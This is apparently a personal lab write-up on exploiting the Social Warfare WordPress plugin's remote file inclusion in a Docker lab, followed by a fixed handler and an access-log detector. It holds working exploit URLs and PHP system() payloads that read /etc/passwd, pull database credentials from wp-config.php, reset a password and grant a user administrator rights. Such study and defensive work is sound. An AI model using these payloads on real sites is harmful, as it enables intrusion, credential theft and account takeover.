---
tags: cybersecurity
---

# wordpress privilege escalation

Use this vulnerable plugin: https://wpvulndb.com/vulnerabilities/9259

Read these articles:

- https://www.cyberpunk.rs/wpscan-usage-example
- https://www.webarxsecurity.com/social-warfare-vulnerability/

## tool

https://github.com/wpscanteam/wpscan

```
docker run -it --rm wpscanteam/wpscan --url http://127.0.0.1:80 --wp-content-dir /wp-content/ --enumerate vp --plugins-detection aggressive
docker run -it --rm wpscanteam/wpscan --url http://127.0.0.1:80 --enumerate u
```

Note that inside the wpscan container `127.0.0.1` is the container itself, not the host; point `--url` at the host's bridge IP (shown below) if the target WordPress runs on the host's port 80.

## build docker image

With https://github.com/wpscanteam/VulnerableWordpress:

```
cd ~/
git clone https://github.com/wpscanteam/VulnerableWordpress.git
cd VulnerableWordpress
docker build -t wordpress:vulnerable .
```

## run docker

A vulnerable WordPress container and a payload server (the image tag must match the one built above, `wordpress:vulnerable`):

```
docker run -d -p 80:80 wordpress:vulnerable
mkdir /root/payload
echo "<pre>system('cat /etc/passwd')</pre>" > /root/payload/payload.txt
docker run -p 81:80 -d -v /root/payload:/usr/share/nginx/html nginx
```

show ip address

```
ifconfig ens33 | grep inet -m1
        inet 192.168.187.213  netmask 255.255.255.0  broadcast 192.168.187.255
```

:::danger
The bridge IP must be used when initializing WordPress for the first time, otherwise the site won't be accessible from outside the container network.
:::

## exploit

```
http://192.168.187.213/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.187.213:81/payload.txt
```

:::warning
The host of `payload.txt` cannot be 127.0.0.1 or localhost: the WordPress container is what fetches `swp_url`, and its loopback is not the host's.

correct: `http://192.168.187.213:81/payload.txt`
incorrect: `http://127.0.0.1:81/payload.txt`
:::

Alternative payload server on port 8088, serving a different host directory:

```
docker run --name payload -p 8088:80 -d -v /home/henryj/Desktop/payload:/usr/share/nginx/html nginx
```

Change the payload to see the MySQL username and password:

```
<pre>system('grep -i -E "db_user|db_password" /var/www/html/wp-config.php')</pre>
```

result

![](https://i.imgur.com/0nWnSOj.png)

## enumerate users

```
wpscan --url http://localhost --enumerate u
```

![](https://i.imgur.com/w7TNSNc.png)

## update user password

This payload:

```
<pre>system('mysql -uwordpress -pwordpress -e "use wordpress; UPDATE wp_users SET user_pass = MD5(\"password\") WHERE user_login=\"user\";"')</pre>
```

Break the payload down into its parts.

ad-hoc exec part:

```
<pre> phpinfo(); </pre>
```

```
<pre>system('mysql -uwordpress -pwordpress -e " # here is sql statement "')</pre>
```

sql statement part:

```sql
use wordpress;
UPDATE wp_users SET user_pass = MD5(\"password\") WHERE user_login=\"user\";
```

examples (each `mysql -e` output follows the command that produced it):

```
<pre>system('mysql -uwordpress -pwordpress -e "use wordpress; select * from wp_users where user_login=\"user1\"; select * from wp_usermeta where user_id=\"2\";"')</pre>

<pre>system('mysql -uwordpress -pwordpress -e "use wordpress; select meta_value from wp_usermeta where meta_key=\'wp_user_level\' and user_id=\'2\';"')</pre>

<pre>system('mysql -uwordpress -pwordpress -e "use wordpress; update wp_usermeta set meta_value = \'a:1:{s:13:\"administrator\";b:1;}\' where meta_key=\'wp_capabilities\' and user_id=\'2\';"')</pre>
meta_value
a:1:{s:13:"administrator";b:1;}

<pre>system('mysql -uwordpress -pwordpress -e "use wordpress; update wp_usermeta set meta_value = \'10\' where meta_key=\'wp_user_level\' and user_id=\'2\';"')</pre>
meta_value
10
```

## which code causes the vulnerability

`is_admin()` only checks whether the requested page is part of the admin interface (`admin-post.php` is), not who is making the request, so it won't prevent an unauthorized visit.
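The fix for that check, as an added example that is not Social Warfare's own code: a WordPress `admin-post.php` handler that gates a debug action on the caller's capability and a nonce instead of on `is_admin()`, and that reads its options locally rather than fetching a URL from a request parameter. The action name `swp_demo_debug`, the option name `swp_demo_options` and the nonce action `swp_demo_debug_nonce` are assumptions chosen for this example.

```php
<?php
/**
 * Added example, not Social Warfare's own code. Contrasts gating an
 * admin-post action with is_admin() (the pattern this page names as the cause
 * of the bug) against gating it on the caller's identity.
 * Assumed names: action "swp_demo_debug", option "swp_demo_options",
 * nonce action "swp_demo_debug_nonce".
 */

// Register the handler for LOGGED-IN requests only. The matching
// "admin_post_nopriv_swp_demo_debug" hook is deliberately not registered, so
// an anonymous request to admin-post.php?action=swp_demo_debug is dropped by
// WordPress before the handler runs.
add_action( 'admin_post_swp_demo_debug', 'swp_demo_debug_handler' );

/**
 * True only for an administrator who arrived via a nonce-signed link.
 * is_admin() is NOT used for authorization: it is true for every request
 * routed through /wp-admin/, including admin-post.php, whoever sends it.
 */
function swp_demo_is_authorized(): bool {
    if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
        return false;
    }
    $nonce = isset( $_REQUEST['_wpnonce'] )
        ? sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) )
        : '';
    // wp_verify_nonce() returns 1 or 2 for a valid nonce, false otherwise.
    return false !== wp_verify_nonce( $nonce, 'swp_demo_debug_nonce' );
}

/**
 * Debug dump of the plugin's own stored options. It reads from the local
 * database only; nothing is fetched from a URL and nothing is eval()'d, so
 * there is no swp_url-style parameter for a caller to point at a payload.
 */
function swp_demo_debug_handler(): void {
    if ( ! swp_demo_is_authorized() ) {
        wp_die( 'Forbidden', 'Forbidden', array( 'response' => 403 ) );
    }
    $options = get_option( 'swp_demo_options', array() );
    header( 'Content-Type: application/json; charset=utf-8' );
    echo wp_json_encode( $options );
    exit;
}

/**
 * Builds the only kind of link that passes swp_demo_is_authorized():
 * admin-post.php?action=swp_demo_debug&_wpnonce=<nonce>
 */
function swp_demo_debug_url(): string {
    return wp_nonce_url(
        admin_url( 'admin-post.php?action=swp_demo_debug' ),
        'swp_demo_debug_nonce'
    );
}
```

Two WordPress facts carry the design: the `admin_post_{action}` hook fires only for authenticated users (the `admin_post_nopriv_{action}` variant is what exposes an action anonymously), and `current_user_can()` plus a nonce is the capability check that `is_admin()` is sometimes mistaken for.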
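On the detection side, as an added example that is not part of the original note: a small scanner over web-server access-log lines that flags the request shape used in the exploit section above (`admin-post.php` with `swp_debug=load_options` and a `swp_url` parameter) and reports which host the `swp_url` pointed at. The log lines are constructed for this example; `192.168.187.213` is the lab address used on this page and `203.0.113.x` is a documentation range.

```php
<?php
/**
 * Added example, not part of the original note. Scans combined-format access
 * log lines for admin-post.php requests carrying swp_debug=load_options and
 * reports the host named in swp_url. Sample lines below are constructed.
 */

const SWP_DEMO_LOG = <<<'LOG'
192.168.187.1 - - [10/May/2019:10:01:02 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.187.213:81/payload.txt HTTP/1.1" 200 512 "-" "curl/7.64.0"
192.168.187.1 - - [10/May/2019:10:01:05 +0000] "GET /wp-login.php HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2019:10:02:40 +0000] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2F203.0.113.9%2Fp.txt HTTP/1.1" 200 300 "-" "python-requests/2.21"
192.168.187.1 - - [10/May/2019:10:03:00 +0000] "GET /?p=1 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
LOG;

/** Parses one combined-format line into its parts, or returns null. */
function swp_demo_parse_line( string $line ): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /';
    if ( ! preg_match( $re, $line, $m ) ) {
        return null;
    }
    return array(
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
    );
}

/**
 * Returns a finding for a request matching the exploit shape, else null.
 * The query string is URL-decoded by parse_str(), so percent-encoded
 * variants of swp_url are matched as well.
 */
function swp_demo_check_request( array $req ): ?array {
    $parts = parse_url( $req['path'] );
    if ( empty( $parts['path'] ) || substr( $parts['path'], -15 ) !== '/admin-post.php' ) {
        return null;
    }
    parse_str( $parts['query'] ?? '', $q );
    if ( ( $q['swp_debug'] ?? '' ) !== 'load_options' ) {
        return null;
    }
    $swp_url      = $q['swp_url'] ?? '';
    $payload_host = parse_url( $swp_url, PHP_URL_HOST ) ?: '(none)';
    return array(
        'ip'           => $req['ip'],
        'time'         => $req['time'],
        'status'       => $req['status'],
        'swp_url'      => $swp_url,
        'payload_host' => $payload_host,
    );
}

/** Runs every line of a log through the parser and the check. */
function swp_demo_scan( string $log ): array {
    $findings = array();
    foreach ( preg_split( '/\R/', trim( $log ) ) as $line ) {
        $req = swp_demo_parse_line( $line );
        if ( $req !== null ) {
            $finding = swp_demo_check_request( $req );
            if ( $finding !== null ) {
                $findings[] = $finding;
            }
        }
    }
    return $findings;
}

// Two of the four constructed lines are reported: the lab request with
// payload host 192.168.187.213 and the encoded one with host 203.0.113.9.
foreach ( swp_demo_scan( SWP_DEMO_LOG ) as $f ) {
    printf(
        "%s %s status=%d swp_url=%s payload_host=%s\n",
        $f['time'], $f['ip'], $f['status'], $f['swp_url'], $f['payload_host']
    );
}
```

A 200 on such a request means the server fetched whatever `swp_url` named, so the payload host is the first thing to pivot on when triaging; a plugin that has been updated past the vulnerable version will not honour the parameter, but the request is still worth alerting on as a scan indicator.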